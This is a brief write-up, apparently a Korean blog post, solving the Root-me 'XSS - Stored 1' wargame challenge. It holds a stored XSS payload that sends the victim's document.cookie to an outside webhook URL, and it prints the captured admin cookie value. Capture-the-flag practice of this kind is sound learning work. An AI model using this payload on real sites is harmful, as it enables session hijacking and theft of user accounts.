Post

XSS - Stored 1

Wargame, Root-me
XSS
Posted

XSS - Stored 1

1
2
3
4
5

Author
g0uZ,  3 March 2012

Statement
Steal the administrator session cookie and use it to validate this chall.

https://webhook.site/을 이용하면 됨.

1
2

title : 아무거나 입력
Message : <script>location.href="webhook에서 받은 url?"+document.cookie;</script>

이렇게 보내주고 바로 확인을 했더니 안나오고 문제를 다시 보려해도 보낸 메시지 때문에 webhook으로 가버림.
다음날 확인해보니 쿠키값이 전송되었음.

1

?ADMIN_COOKIE=NkI9qe4cdLIO2P7MIsWS8ofD6
Wargame, Root-me
XSS
This post is licensed under CC BY 4.0 by the author.